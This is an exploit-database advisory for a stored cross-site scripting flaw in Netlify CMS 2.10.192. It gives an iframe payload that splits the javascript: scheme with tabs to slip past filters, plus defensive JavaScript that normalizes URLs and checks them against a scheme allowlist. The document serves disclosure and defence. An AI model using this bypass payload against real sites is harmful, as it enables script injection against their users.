Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
Author: tmrswrr
type: webapps
platform: java
port:
date_added: 2023-07-11
date_updated: 2023-07-15
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
raw file: 51576.txt
# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr
# Vendor Homepage: https://decapcms.org/docs/intro/
# Software Link: https://github.com/decaporg/decap-cms
# Version: 2.10.192
# Tested on: https://cms-demo.netlify.com

Description:

1. Go to new post and enter your payload in the body field:

https://cms-demo.netlify.com/#/collections/posts

Payload = <iframe src=java	sc	ript:al	ert()></iframe>

2. After saving, the XSS payload is executed and an alert box appears.
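Added example (not part of the original advisory or of the Decap CMS code base): the payload above splits the javascript: scheme with tab characters, which a browser's URL parser removes before it reads the scheme, so a substring filter misses it. The check below normalizes a src/href value the same way before applying a scheme allowlist; the function names and the allowlist are assumptions.

```javascript
// Schemes permitted in URL-valued attributes (assumed policy).
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// src value from the payload on this page, tabs written as \t.
const PAGE_SRC = "java\tsc\tript:al\tert()";

// Naive filter: rejects only the literal substring "javascript:".
function naiveIsSafe(value) {
  return !value.toLowerCase().includes("javascript:");
}

// Same preprocessing as the WHATWG URL parser: trim leading/trailing
// C0 control characters and spaces, then drop every ASCII tab and newline.
function normalizeUrl(value) {
  return value
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
}

// Hardened check: decide on the scheme the browser will actually see.
// Run it on attribute values after HTML parsing, so entities are decoded.
function isSafeUrl(value) {
  const url = normalizeUrl(value);
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(url);
  if (!m) return true; // no scheme: relative reference
  return ALLOWED_SCHEMES.has(m[1].toLowerCase());
}

// Constructed sample values, checked with both filters.
const samples = [
  PAGE_SRC,
  "  JaVaScRiPt:alert()",
  "https://example.com/a",
  "/posts/1",
];
for (const s of samples) {
  console.log(JSON.stringify(s), "naive:", naiveIsSafe(s), "hardened:", isSafeUrl(s));
}
```
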